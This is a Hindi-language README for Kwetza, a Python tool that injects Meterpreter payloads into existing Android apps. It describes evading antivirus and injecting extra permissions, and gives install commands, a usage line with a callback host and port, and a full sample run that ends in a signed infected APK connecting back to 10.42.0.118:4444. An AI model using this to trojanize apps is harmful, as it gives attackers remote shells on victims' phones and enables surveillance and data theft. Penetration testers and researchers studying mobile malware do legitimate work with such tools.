
मौजूदा Android एप्लिकेशनों में Meterpreter payload इंजेक्ट करने के लिए Python स्क्रिप्ट।
द्वारा: Chris Le Roy (@brompwnie) [email protected]
Kwetza एक उपकरण है जो आपको मौजूदा Android एप्लिकेशन को Meterpreter पेलोड से संक्रमित करने की अनुमति देता है।
Kwetza मौजूदा Android एप्लिकेशन को कस्टम या डिफ़ॉल्ट पेलोड टेम्पलेट्स के साथ संक्रमित करता है ताकि एंटीवायरस से बचा जा सके। Kwetza आपको लक्ष्य एप्लिकेशन की डिफ़ॉल्ट अनुमतियों का उपयोग करके या अतिरिक्त अनुमतियाँ इंजेक्ट करके अतिरिक्त कार्यक्षमता प्राप्त करने की अनुमति देता है।
Kwetza द्वारा स्वचालित मैनुअल चरण यहाँ पाए जा सकते हैं: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/
सबसे पहले कोड प्राप्त करें:
git clone https://github.com/sensepost/kwetza.git
Kwetza Python में लिखा गया है और इसके लिए BeautifulSoup की आवश्यकता है जिसे Pip का उपयोग करके स्थापित किया जा सकता है:
pip install beautifulsoup4
Kwetza के लिए Apktool को स्थापित और आपके PATH के माध्यम से सुलभ होना आवश्यक है। इसे यहाँ स्थापित निर्देशों का उपयोग करके सेट किया जा सकता है: https://ibotpeaches.github.io/Apktool/install
python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.
###########################################
[+] L00t located at hackme/dist/hackme.apk
Kwetza को Python 2 के साथ काम करने के लिए विकसित किया गया है।
Kwetza डिफ़ॉल्ट रूप से "payload" फ़ोल्डर में स्थित टेम्पलेट और कीस्टोर का उपयोग करके संक्रमित APK को इंजेक्ट और साइन करेगा।
यदि आप संक्रमित एप्लिकेशन को अपने स्वयं के प्रमाणपत्र से साइन करना चाहते हैं, तो एक नया कीस्टोर जनरेट करें और इसे "payload" फ़ोल्डर में रखें और मौजूदा कीस्टोर का नाम बदलें या kwetza.py में संदर्भ बदलें।
पेलोड टेम्पलेट्स के लिए भी ऐसा ही किया जा सकता है।
डिफ़ॉल्ट कीस्टोर का पासवर्ड, ठीक है, "password" है।
Kwetza Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0) के तहत लाइसेंस प्राप्त है।
इस लाइसेंस के दायरे से परे अनुमतियाँ http://sensepost.com/contact पर उपलब्ध हो सकती हैं।